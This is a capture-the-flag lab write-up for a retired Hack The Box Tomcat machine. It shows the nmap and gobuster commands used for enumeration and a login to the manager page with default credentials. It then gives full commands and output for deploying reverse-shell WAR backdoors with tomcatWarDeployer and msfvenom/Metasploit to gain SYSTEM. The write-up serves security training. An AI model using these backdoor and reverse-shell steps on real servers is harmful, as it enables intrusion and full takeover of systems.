Site just retired, focussed on Tomcat and malicious WAR files! Lets get started.
Enumeration
As always, lets Nmap the box:
Nmap 7.70 scan initiated Sat Jun 30 19:27:39 2018 as: nmap -sC -sV -oA initial-nmap -p- 10.10.10.95 Nmap scan report for 10.10.10.95 Host is up (0.22s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
Initial scan shows that a site is running at 8080 and that it is probably a Tomcatsite. Lets’s connect:
Yep. Thats Tomcat alright. Lets start gobuster to see what dirs we can find:
sudo gobuster -u <a href="http://10.10.10.95:8080">http://10.10.10.95:8080</a> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,pdf,txt,cgi,php Gobuster v1.4.1 OJ Reeves (@TheColonial) ===================================================== ===================================================== [+] Mode : dir [+] Url/Domain : <a href="http://10.10.10.95:8080/">http://10.10.10.95:8080/</a> [+] Threads : 10 [+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Status codes : 301,302,307,200,204 [+] Extensions : .html,.pdf,.txt,.cgi,.php ===================================================== /docs (Status: 302) /test (Status: 302) /examples (Status: 302) /manager (Status: 302)
That /manager part looks interesting. It’s also noted on the screenshot above. Lets visit the url:
It triggers a user name and password. Lets press Escape to get out of the login. Huh, we’re presented with a weird error message.
So the error message displays how to setup a user. As an example, it notes ‘tomcat’ as user name and ‘s3cret’ as a password. What happens if we just try these default credentials?
Guess we are lucky :).
Exploitation
After doing some research, I end up at this site that describes how to create a WAR package that triggers a reverse shell. The post from 2012 explains:
“If we have performed a penetration test against an Apache Tomcat server and we have managed to gain access then we might want to consider to place a web backdoor in order to maintain our access.Apache Tomcat accepts .WAR file types so our backdoor must have this file extension.In case that we don’t have a WAR backdoor already in our disposal we can use Metasploit to create one very fast.” Searching Metasploit didn’t really give me anything useful intially, so I Googled on. It then found the tomcatWarDeployer, which perfectly seemed to fit my needs.
Lets run it:
sudo python tomcatWarDeployer.py -v -U tomcat -P s3cret -H mylocalIPadress -p 1337 10.10.10.95:8080 tomcatWarDeployer (v. 0.4) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18 Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured. INFO: Reverse shell will connect to: mylocalIPadress:1337. DEBUG: Browsing to "<a href="http://10.10.10.95:8080/">http://10.10.10.95:8080/"...</a> Creds: "tomcat:s3cret" DEBUG: Trying to fetch: "<a href="http://10.10.10.95:8080/">http://10.10.10.95:8080/"</a> DEBUG: Probably found something: Apache Tomcat/7.0.88 DEBUG: Trying to fetch: "<a href="http://10.10.10.95:8080/manager">http://10.10.10.95:8080/manager"</a> DEBUG: Probably found something: Apache Tomcat/7.0.88 DEBUG: Apache Tomcat/7.0.88 Manager Application reached & validated. DEBUG: Generating JSP WAR backdoor code... DEBUG: Preparing additional code for Reverse TCP shell DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmpkmv2aR" DEBUG: Working with Java at version: 10.0.1 DEBUG: Generating web.xml with servlet-name: "JSP Application" DEBUG: Generating WAR file at: "/tmp/jsp_app.war" DEBUG: added manifest adding: files/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%) adding: files/META-INF/(in = 0) (out= 0)(stored 0%) adding: files/META-INF/MANIFEST.MF(in = 66) (out= 66)(deflated 0%) adding: index.jsp(in = 4494) (out= 1686)(deflated 62%) INFO: It looks that the application with specified name "jsp_app" has not been deployed yet. DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war" DEBUG: Removing temporary WAR directory: "/tmp/tmpkmv2aR" DEBUG: Succeeded, invoking it... DEBUG: Spawned shell handling thread. Awaiting for the event... DEBUG: Awaiting for reverse-shell handler to set-up DEBUG: Establishing listener for incoming reverse TCP shell at mylocalIPadress:1337 DEBUG: Socket is binded to local port now, awaiting for clients... DEBUG: Invoking application at url: "<a href="http://10.10.10.95:8080/jsp_app/">http://10.10.10.95:8080/jsp_app/"</a> DEBUG: Adding 'X-Pass: 9PHwwfFA9Ald' header for shell functionality authentication. DEBUG: Incoming client: 10.10.10.95:49195 DEBUG: Application invoked correctly. INFO: JSP Backdoor up & running on <a href="http://10.10.10.95:8080/jsp_app/">http://10.10.10.95:8080/jsp_app/</a> INFO: Happy pwning. Here take that password for web shell: '9PHwwfFA9Ald' INFO: Connected with: nt authority\[email protected] C:\apache-tomcat-7.0.88> whoami nt authority\system
Game, set and match.
Another way to do this, is to use msfvenom to generate a payload. We then upload the payload and execute it by visiting it. On our end, we setup a listener and upgrade the shell we get to meterpretershell. I got this idea from the following Youtube video:
First, generate the payload:
msfvenom -p java/shell_reverse_tcp LHOST= XXX LPORT=1337 -f war > pwnd.war sudo msfvenom -p java/shell_reverse_tcp LHOST=mylocalIPadress LPORT=1337 -f war > pwnd.war Payload size: 13402 bytes Final size of war file: 13402 bytes
Then, setup a listener to catch the session:
msf exploit(multi/handler) > set LHOST mylocalIPadress LHOST => mylocalIPadress msf exploit(multi/handler) > set LPORT 1337 LPORT => 1337 msf exploit(multi/handler) > set LHOST tun0 LHOST => tun0 msf exploit(multi/handler) > set payload java/shell_reverse_tcp payload => java/shell_reverse_tcp msf exploit(multi/handler) > run
Proceed to upload the .war file and visit the approriate site to trigger the payload. You should get a shell:
[*] Started reverse TCP handler on mylocalIPadress:1337 [*] Command shell session 1 opened (mylocalIPadress:1337 -> 10.10.10.95:49196) at 2018-07-07 18:46:33 +0000 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88> Background session 1? [y/N] y
After background the session, you can use the shell_to_meterpreter module to upgrade the session.
Name Disclosure Date Rank Description ---- --------------- ---- ----------- post/multi/manage/shell_to_meterpreter normal Shell to Meterpreter Upgrade msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter msf post(multi/manage/shell_to_meterpreter) > set LPORT 1337 LPORT => 1337 msf post(multi/manage/shell_to_meterpreter) > run msf post(multi/manage/shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell java/java Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ... mylocalIPadress:1337 -> 10.10.10.95:49196 (10.10.10.95) msf post(multi/manage/shell_to_meterpreter) > set SESSION 1 SESSION => 1 C:\Users\Administrator\Desktop\flags>
Privilege escalation
Not needed, since you are already sytem. Flags can be found in C:\Users\Administrator\Desktop\flags>
As always, IppSec created an awesome and very informative video about this box.